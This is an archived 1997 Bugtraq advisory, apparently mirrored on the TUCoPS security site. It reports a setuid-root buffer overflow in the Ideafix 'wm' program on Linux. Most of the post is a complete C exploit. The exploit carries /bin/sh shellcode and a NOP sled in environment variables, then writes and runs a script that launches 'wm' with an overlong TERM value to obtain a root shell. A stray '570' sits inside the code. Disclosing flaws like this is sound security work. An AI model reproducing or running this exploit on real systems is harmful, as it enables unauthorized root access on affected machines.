Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps A-M :: ideafi~1.txt

Ideafix overflow





Date: Sun, 19 Oct 1997 05:04:18 -0400
From: Bst Perez Companc <bst@INAME.COM>
To: BUGTRAQ@NETSPACE.ORG

A vulnerability exist in the package Ideafix distributed with several
versions of linux. [ ftp://sunsite.unc.edu/pub/Linux/devel/ideafix ]
                   [ ftp://ftp.inter-soft.com/pub/ideafix ].
This is a very popular development enviroment here in Argentina.
Due to the lack of proper bounds checking in the setuid root program wm, the
enviroment variable TERM is copied into a local fixedsize buffer, you guess
it, a shell with euid=0

Comments: bisti <bst@iname.com>
Greetz to fidel, larry, rb, rnt, veida.

[--------------------------- wm_exp.c ---------------------------]

/*
 * 'Ideafix wm' Exploit 4 Linux.
 */

#include <stdio.h>
#include <stdlib.h>

#define TERMSIZE        2000
#define HUEVOSIZE       5000

char *shell =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

long
esp(void)
{
__asm__("movl %esp,%eax\n");
}

int
main(void)
{

    char *ptr, *bof, *egg;
    long *addr_ptr, addr;
    int i;


    if ( !(bof = malloc(TERMSIZE)) ) {
      printf("NoMoreMemory4bof.\n");
      exit(1);
    }

    if ( !(egg = malloc(HUEVOSIZE)) ) {
      printf("NoMoreMemory4egg.\n");
      exit(1);
    }

    addr = esp();

    addr_ptr = (long *) bof;
    for (i = 0; i < TERMSIZE; i += 4)
    *(addr_ptr++) = addr;

    ptr = egg;
    for (i = 0; i <= HUEVOSIZE - strlen(shell) - 2; i++)
        *(ptr++) = 0x90;

    for( i = 0; i < strlen(shell); i++)
        *(ptr++) = shell[i];


    bof[TERMSIZE - 1] = '\0';
    egg[HUEVOSIZE - 1] = '\0';

    memcpy(bof, "BOF=", 4);
    memcpy(egg , "EGG=", 4);

    putenv(bof);
    putenv(egg);

    system("echo '#!/bin/sh' >> doit");
    system("echo -n '# We kill any instance of wm, set TERM, ' >> doit");
    system("echo 'and run the vulnerable program.' >> doit");
    system("echo '# Bisti [111097]' >> doit");
    system("echo 'killall wm' >> doit");
    system("echo 'TERM=$BOF;export TERM' >> doit");
    system("echo '/usr/local/inter-soft/ideafix-4.3.2/bin/wm' >> doit");

    system("sh ./doit");


570
}
[---------------------------------------------------------------------------]



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH